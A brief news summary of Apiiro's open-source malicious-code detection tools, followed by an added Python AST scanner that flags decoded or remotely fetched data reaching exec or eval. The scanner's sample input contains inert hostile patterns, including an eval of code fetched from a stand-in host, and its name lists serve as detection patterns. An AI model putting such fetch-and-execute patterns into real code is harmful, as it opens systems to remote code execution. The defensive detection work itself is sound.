2025-02-21

BleepingComputer reports that Apiiro, an application security posture management firm, has unveiled a pair of open-source tools aimed at combating malicious code injections and software supply chain intrusions. The first of the free tools is a comprehensive Semgrep and Opengrep ruleset that can be run in continuous integration and continuous deployment pipelines; it has yielded 94.3% and 88.4% accuracy in identifying malicious code in PyPI and NPM packages, respectively. The second, the GitHub-integrated scanner PRevent, yielded 91.5% accuracy in identifying malicious pull requests. Both tools, which can be downloaded for free on GitHub, were touted by Apiiro as flagging malicious code through "anti-patterns," including encoding, nested transformation, and other obfuscation techniques; the use of functions that permit arbitrary code execution; the presence of code that downloads and executes a remote payload; and methods for stealing sensitive user data. Although neither tool can yet discover malware hidden in compiled binaries or scan PyPI and NPM packages directly, Apiiro says both are slated to gain AI-assisted scanning and deep code analysis features in the future.
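
To make the "anti-pattern" approach concrete, here is an added example written for this summary (it is not Apiiro's ruleset or code): a small Python AST scanner that flags two of the patterns named above, a decoded or transformed payload and a remotely fetched payload reaching an arbitrary-execution function. The sink, transform and fetch name sets, the `scan` function and the sample input are all assumptions constructed for the demonstration.

```python
# Added illustration (not Apiiro's ruleset): minimal AST scanner for two of the article's
# anti-patterns, decoded/transformed or remotely fetched data reaching an exec sink.
import ast

EXEC_SINKS = {"exec", "eval", "compile"}                      # run whatever they receive
TRANSFORMS = {"b64decode", "b32decode", "b85decode", "decompress", "unhexlify", "fromhex"}
FETCHES = {"urlopen", "urlretrieve"}                           # pull a payload off the network

def _call_name(node):
    """Bare callee name of a Call node: 'b64decode' for base64.b64decode(...)."""
    return getattr(node.func, "attr", getattr(node.func, "id", None))

def _reason(expr, tainted):
    """Why an expression is suspicious, or None if nothing flagged feeds it."""
    names = set()
    for sub in ast.walk(expr):
        if isinstance(sub, ast.Call):
            names.add(_call_name(sub))
        elif isinstance(sub, ast.Name) and sub.id in tainted:
            return tainted[sub.id]                 # derived from an already-flagged variable
    if names & FETCHES:
        return "remote payload"
    if names & TRANSFORMS:
        return "decoded/transformed payload"
    return None

def scan(source):
    """Return (lineno, sink, reason) for every exec-style call fed by flagged data."""
    tree = ast.parse(source)
    tainted = {}   # variable name -> reason; flow-insensitive, good enough for a demo
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign) and isinstance(node.targets[0], ast.Name):
            reason = _reason(node.value, tainted)
            if reason:
                tainted[node.targets[0].id] = reason
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _call_name(node) in EXEC_SINKS:
            reasons = [r for r in (_reason(a, tainted) for a in node.args) if r]
            if reasons:
                findings.append((node.lineno, _call_name(node), reasons[0]))
    return findings
# Constructed sample input: the blob is an arbitrary base64 string that is only parsed, never run.
SAMPLE = '''
import base64, urllib.request
blob = "Y29uc3RydWN0ZWQ="
payload = base64.b64decode(blob)[::-1]
exec(payload)
eval(urllib.request.urlopen("https://example.invalid/p").read())
'''
```

Running `scan(SAMPLE)` reports the `exec` on line 5 (transformed payload) and the `eval` on line 6 (remote payload), while a literal such as `exec('x = 1')` is left alone; a production ruleset would add real dataflow and far more sink and transform names.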
